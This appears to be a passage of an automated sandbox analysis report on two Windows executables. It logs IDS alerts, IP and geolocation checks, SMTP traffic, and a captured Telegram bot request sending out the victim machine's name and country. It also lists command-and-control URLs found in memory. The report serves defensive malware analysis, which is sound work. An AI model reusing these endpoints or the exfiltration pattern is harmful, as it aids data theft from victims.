                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49753 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49769 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49736 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49758 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.4:50126 -> 68.66.224.41:587
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49734 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49743 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:445817%0D%0ADate%20and%20Time:%2007/10/2024%20/%2015:26:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20445817%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:445817%0D%0ADate%20and%20Time:%2007/10/2024%20/%2014:46:36%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20445817%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficDNS traffic detected: DNS query: mail.precioustouchfoundation.org
                  Source: global trafficDNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 07 Oct 2024 06:51:31 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 07 Oct 2024 06:51:35 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003179000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002C89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1723487910.000000000432A000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4140515962.0000000000435000.00000040.00000400.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 00000007.00000002.1769534366.0000000004B97000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 00000007.00000002.1769534366.00000000049FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1723487910.000000000432A000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003071000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 00000007.00000002.1769534366.0000000004B97000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 00000007.00000002.1769534366.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4140515527.0000000000434000.00000040.00000400.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002B81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1723487910.000000000432A000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003071000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 00000007.00000002.1769534366.0000000004B97000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 00000007.00000002.1769534366.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4140515527.0000000000434000.00000040.00000400.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002B81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003071000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002B81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003071000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002B81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1723487910.000000000432A000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4140515962.0000000000435000.00000040.00000400.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 00000007.00000002.1769534366.0000000004B97000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 00000007.00000002.1769534366.00000000049FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003205000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003179000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002C89000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002D14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.precioustouchfoundation.org
                  Source: 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003205000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003179000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002C89000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002D14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://precioustouchfoundation.org
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1722967795.0000000002D44000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003071000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 00000007.00000002.1768336189.0000000003154000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002B81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1723487910.000000000432A000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003071000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 00000007.00000002.1769534366.0000000004B97000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 00000007.00000002.1769534366.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4140515527.0000000000434000.00000040.00000400.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002B81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000000.00000002.1728892252.0000000005474000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003157000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002C66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1723487910.000000000432A000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003157000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 00000007.00000002.1769534366.0000000004B97000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 00000007.00000002.1769534366.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002C66000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4140515527.0000000000436000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003157000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002C66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003157000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002C66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:445817%0D%0ADate%20a
                  Source: lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002D42000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002D73000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002C89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.000000000322E000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002D3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                  Source: 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003130000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003157000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002C40000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002C66000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002BD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: 2i3Lj7a8Gk.exe, 00000000.00000002.1723487910.000000000432A000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4140515962.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 00000007.00000002.1769534366.0000000004B97000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 00000007.00000002.1769534366.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002BD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002BD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                  Source: 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003130000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003157000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002C40000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002C66000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002BFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
